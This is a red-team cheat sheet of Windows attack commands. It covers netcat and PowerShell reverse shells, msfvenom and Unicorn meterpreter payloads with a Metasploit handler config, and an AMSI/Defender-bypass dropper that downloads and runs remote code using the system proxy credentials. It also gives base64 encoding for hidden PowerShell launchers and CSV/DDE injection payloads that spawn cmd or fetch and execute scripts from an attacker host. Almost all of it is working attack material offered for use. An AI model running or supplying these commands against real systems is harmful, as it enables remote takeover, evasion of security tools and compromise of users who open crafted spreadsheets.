Reverse Shell

nc

nc.exe <ip> <port> -e cmd.exe

Unicorn

python unicorn.py windows/meterpreter/reverse_https <ip> <port>

PowerShell

Process 64Bit

c:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell "IEX(New-Object Net.WebClient).downloadstring('http://<ip>/<shell.ps1>')"
/usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1
$client = New-Object System.Net.Sockets.TCPClient("<ip>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Bypass Windows Defender / AMSI + system proxy credentials (28/06/2018)

HANDLER RC FILE
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set LURI /api/callback
set ExitonSession false
PAYLAODS
msfvenom -p windows/x64/meterpreter/reverse_https lhost=<ip/domain> lport=443 luri=/api/callback -e x64/xor -f psh-net -o payload.pshnet
python -m SimpleHTTPServer 80
DROPPER BUILD

Encoding dropper with https://gchq.github.io/CyberChef/

encode_text: UTF16LE (1200)
to_base64
input:
$mem=[System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076);[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiSession','NonPublic,Static').SetValue($null, $null);[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext','NonPublic,Static').SetValue($null, [IntPtr]$mem);[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$e=new-object net.webclient;$e.proxy=[Net.WebRequest]::GetSystemWebProxy();$e.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $e.downloadstring('http://<ip/domain>/payload.pshnet')

Encoding dropper with PowerShell

B64 Ecoding:
$Base64 = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes([System.IO.File]::ReadAllText("C:\Users\<..>\amsi-bypass.ps1")))
Write-Output $Base64| Out-File "payload-b64"

B64 Decoding:
$bytes = [Convert]::FromBase64String($Base64)
[IO.File]::WriteAllBytes("C:\Users\<..>\payload-b64-decoded", $bytes)
FINAL DROPPER
powershell.exe -NoP -NonI -W Hidden -e <base64_cyberchef>

CSV injection

PoC
=cmd|' /c calc'!A1
=cmd|'/c REM.&&@p^o^w^e^r^s^h^e^l^l c:/*/*2/?al?.?x?"'!_xlbgnm.A1

Use domains if possible
For powershell the convertion in B64 must be done in unicode (see below)

Short + bypass defender + B64 convertion (Unicode) (04/06/2018)
$Base64 = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes([System.IO.File]::ReadAllText("C:\Users\rsh.ps1")))
Write-Output $Base64 |  Out-File -FilePath "C:\Users\rsh.b64"

Content of f file:
powershell -e <C:\Users\rsh.b64>

powershell "wget 192.168.1.1/f|iex"
DownloadString

Use double simple quote to escape simple quote in #Powershell Iex payload (even if b64 encoded)

=cmd|'/c powershell.exe -command iex (new-object Net.WebClient).DownloadString(''http://<ip/domain>/f.ps1'')'!_A1